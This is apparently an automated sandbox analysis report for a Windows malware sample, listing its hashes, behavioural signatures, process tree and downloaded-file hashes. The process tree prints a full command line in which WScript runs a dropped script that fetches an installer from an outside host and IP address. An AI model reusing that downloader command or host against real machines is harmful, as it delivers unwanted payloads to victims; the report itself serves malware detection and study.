Analysis
-
max time kernel
121s -
max time network
125s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
11-05-2024 12:32
Static task
static1
Behavioral task
behavioral1
Sample
349a524964cc89c86fb99b9ba2d9444b_JaffaCakes118.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
349a524964cc89c86fb99b9ba2d9444b_JaffaCakes118.exe
Resource
win10v2004-20240426-en
General
-
Target
349a524964cc89c86fb99b9ba2d9444b_JaffaCakes118.exe
-
Size
184KB
-
MD5
349a524964cc89c86fb99b9ba2d9444b
-
SHA1
5dcb9da0d327b00eb9974d46787b0ba73cc71d62
-
SHA256
a053df342e76cae0b28561a8653dc4505cb9dc8e6df5beeb6f26d22b3fa18bd2
-
SHA512
dd6ca285abf640a62bb4b118495cd565d4a1528104d4cbe09201596214100bfbf8e9ab5a73ab64e74cf62b7a7f74ab9d1035f6cefd48ce6066ac85649e9705fb
-
SSDEEP
3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO3x:/7BSH8zUB+nGESaaRvoB7FJNndnc
Malware Config
Signatures
-
Blocklisted process makes network request 11 IoCs
Processes:
WScript.exeWScript.exeWScript.exeWScript.exeWScript.exeflow pid process 6 2916 WScript.exe 8 2916 WScript.exe 10 2916 WScript.exe 12 2676 WScript.exe 13 2676 WScript.exe 16 2764 WScript.exe 17 2764 WScript.exe 19 2348 WScript.exe 20 2348 WScript.exe 22 1976 WScript.exe 23 1976 WScript.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 20 IoCs
Processes:
349a524964cc89c86fb99b9ba2d9444b_JaffaCakes118.exedescription pid process target process PID 2124 wrote to memory of 2916 2124 349a524964cc89c86fb99b9ba2d9444b_JaffaCakes118.exe WScript.exe PID 2124 wrote to memory of 2916 2124 349a524964cc89c86fb99b9ba2d9444b_JaffaCakes118.exe WScript.exe PID 2124 wrote to memory of 2916 2124 349a524964cc89c86fb99b9ba2d9444b_JaffaCakes118.exe WScript.exe PID 2124 wrote to memory of 2916 2124 349a524964cc89c86fb99b9ba2d9444b_JaffaCakes118.exe WScript.exe PID 2124 wrote to memory of 2676 2124 349a524964cc89c86fb99b9ba2d9444b_JaffaCakes118.exe WScript.exe PID 2124 wrote to memory of 2676 2124 349a524964cc89c86fb99b9ba2d9444b_JaffaCakes118.exe WScript.exe PID 2124 wrote to memory of 2676 2124 349a524964cc89c86fb99b9ba2d9444b_JaffaCakes118.exe WScript.exe PID 2124 wrote to memory of 2676 2124 349a524964cc89c86fb99b9ba2d9444b_JaffaCakes118.exe WScript.exe PID 2124 wrote to memory of 2764 2124 349a524964cc89c86fb99b9ba2d9444b_JaffaCakes118.exe WScript.exe PID 2124 wrote to memory of 2764 2124 349a524964cc89c86fb99b9ba2d9444b_JaffaCakes118.exe WScript.exe PID 2124 wrote to memory of 2764 2124 349a524964cc89c86fb99b9ba2d9444b_JaffaCakes118.exe WScript.exe PID 2124 wrote to memory of 2764 2124 349a524964cc89c86fb99b9ba2d9444b_JaffaCakes118.exe WScript.exe PID 2124 wrote to memory of 2348 2124 349a524964cc89c86fb99b9ba2d9444b_JaffaCakes118.exe WScript.exe PID 2124 wrote to memory of 2348 2124 349a524964cc89c86fb99b9ba2d9444b_JaffaCakes118.exe WScript.exe PID 2124 wrote to memory of 2348 2124 349a524964cc89c86fb99b9ba2d9444b_JaffaCakes118.exe WScript.exe PID 2124 wrote to memory of 2348 2124 349a524964cc89c86fb99b9ba2d9444b_JaffaCakes118.exe WScript.exe PID 2124 wrote to memory of 1976 2124 349a524964cc89c86fb99b9ba2d9444b_JaffaCakes118.exe WScript.exe PID 2124 wrote to memory of 1976 2124 349a524964cc89c86fb99b9ba2d9444b_JaffaCakes118.exe WScript.exe PID 2124 wrote to memory of 1976 2124 349a524964cc89c86fb99b9ba2d9444b_JaffaCakes118.exe WScript.exe PID 2124 wrote to memory of 1976 2124 349a524964cc89c86fb99b9ba2d9444b_JaffaCakes118.exe WScript.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\349a524964cc89c86fb99b9ba2d9444b_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\349a524964cc89c86fb99b9ba2d9444b_JaffaCakes118.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2124 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf1593.js" http://www.djapp.info/?domain=eWZnhdHUsC.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf1593.exe2⤵
- Blocklisted process makes network request
PID:2916 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf1593.js" http://www.djapp.info/?domain=eWZnhdHUsC.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf1593.exe2⤵
- Blocklisted process makes network request
PID:2676 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf1593.js" http://www.djapp.info/?domain=eWZnhdHUsC.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf1593.exe2⤵
- Blocklisted process makes network request
PID:2764 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf1593.js" http://www.djapp.info/?domain=eWZnhdHUsC.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf1593.exe2⤵
- Blocklisted process makes network request
PID:2348 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf1593.js" http://www.djapp.info/?domain=eWZnhdHUsC.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf1593.exe2⤵
- Blocklisted process makes network request
PID:1976
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
Filesize1KB
MD557b1b5453fd21a15ec32fee93515efbe
SHA171b7fea3000a04bee4b875834101cc64ddccc72b
SHA256c4f6569e2a98b4523a8a772c1d55461e9e3415712bb423e9d8ba1b70ac509aa2
SHA5124eee10ed4dc800964073ac65d2569e1713a0d0539ac275ff511c06bdcca63f2b2c8cf59961bdf63406277931360f39657526d56e453f5b097b897882e2a2e8cc
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464
Filesize724B
MD58202a1cd02e7d69597995cabbe881a12
SHA18858d9d934b7aa9330ee73de6c476acf19929ff6
SHA25658f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5
SHA51297ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
Filesize410B
MD51e3a95dd4102af73fbd598d23edae461
SHA125c359208e6de93f6f0e6de771c86952cd2d8a64
SHA256abdc767e4380670689a6622d6e1e37863c07172d1d9a9cbbb6e99a31460a4e62
SHA5120eb606dfd465b64bcde766672a2f835cddc12dba45c1d4ec4ebaef81ef9c62ace118e3a83a57874aa2dfcaa6584a64b00e5eb0bcbd506a9ad354f41c9b30e6ce
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD506cd939f3ffaa3032823ed11ef9f3d1f
SHA171e29d1999c4b524e17e02e0d4e5296722582d43
SHA256e5ef17ee50030f5e79e6816b6902a3f23db03b007b3806fe5588a25dc69b923b
SHA512bf4bf4b185fb68e21cb5f9ea3237688e70d2738302c152f23394cd95ac472d041c4d94550365008abc772fb35fec89af0bf6bfa491ee21f8544b9145e1803d5f
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464
Filesize392B
MD5f1d505ce47713eb394f657b26a493251
SHA19780c4234da778de8f800e8a6252c8ce883eee65
SHA2566f1a97f4b0b1f6282a57f728b94fd0e8856e68d7736fcc3c267dbdbaa8a599eb
SHA512963f74a4720acbfe33006dbdacef7217993cc8ee68abe9f822cef7aa9059fee458c782f26159075f42d433f2d718cc4b45d51bd1404afcb33591c117d11ea089
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\3NPBB818\domain_profile[1].htm
Filesize40KB
MD5d202c1bd6afa688e65943f99dc7c09d0
SHA1718c32173ca945ae1582e813667b325896148447
SHA2564fcb111420a690cee8d767e163443564948b27c0b30f67bd312e4165022dfb69
SHA51241dc2ee50c21275cc7395a45fb74e3cd53e3ceeb8e60d3032024592496f4f635c8f7346eddc56e52accf61d8606f1be77cceb9d6e723fc665704bfc3966f7ec2
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\3NPBB818\domain_profile[1].htm
Filesize6KB
MD558d012284e82556163670c914a5c02d4
SHA1154cd289dfedb8a937e64bc1de2580786cf3d384
SHA256f904083ec2068d7f3efc04512f9638dcb8bc6bf28f53626a3f726403f0c306dc
SHA512f0d65111699dbdcb5195a2b63826a69c9088cadc1e4e51499e0fb9fb3c3ed47aa16b5991544d78e75727971982466082b8a7bd39bc26b2b1e2e55b50e908ee0c
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EDQW9R5V\domain_profile[1].htm
Filesize40KB
MD50ded63278561c542a0bf8e00a9ed93cd
SHA1cdc18a11f1663afdd218df61d8a03d62a2482989
SHA256473050b5c31158f353c0385e05c5bfccc9a41f068c7a4289db671bf6adea7181
SHA5127fe931b617d03ee3d4de5be06a5c1080800a12d766407e90a99bc85b84b5833e690c7e6c7704a30198930fdf72aa60febfe8520a56c2db6be1a287506f3cf898
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EDQW9R5V\domain_profile[1].htm
Filesize40KB
MD5f2cdedcba91bf71f10990a9ebca5da20
SHA1deb1451760d0f37ea3fa7b350fb57c6fbe76a2d7
SHA256874921d68f3c98e5d94f175fff31ba3a743dc7645b50b34858283febc0afe428
SHA5128d96f7c6a45a0d91b21b3c20beb13129da41c45257b5f0f349acf7b4c69c02feb032be0e40eee1b8256e923c72350489e8c318b8f1fe04b4733bd196acd99784
-
Filesize
65KB
MD5ac05d27423a85adc1622c714f2cb6184
SHA1b0fe2b1abddb97837ea0195be70ab2ff14d43198
SHA256c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d
SHA5126d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d
-
Filesize
171KB
MD59c0c641c06238516f27941aa1166d427
SHA164cd549fb8cf014fcd9312aa7a5b023847b6c977
SHA2564276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f
SHA512936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06
-
Filesize
3KB
MD53813cab188d1de6f92f8b82c2059991b
SHA14807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb
SHA256a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e
SHA51283b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76
-
Filesize
173B
MD5286ef38304737b08a11fa89894102be3
SHA1622478c94c2d1923ef6b7e3d2f449687297db43d
SHA256de76be272acc05b2c024fa89a6087d56a99b501859941603071cf93e9d75b4c2
SHA51203e5dc0cc962e6589cc7bb92b628377d7fde25aaf84eb276ef021f72401cc6f8d297c687f1d6e1eae3dd897dc0e063f6c49605c04be84428e79de371b8a0f99c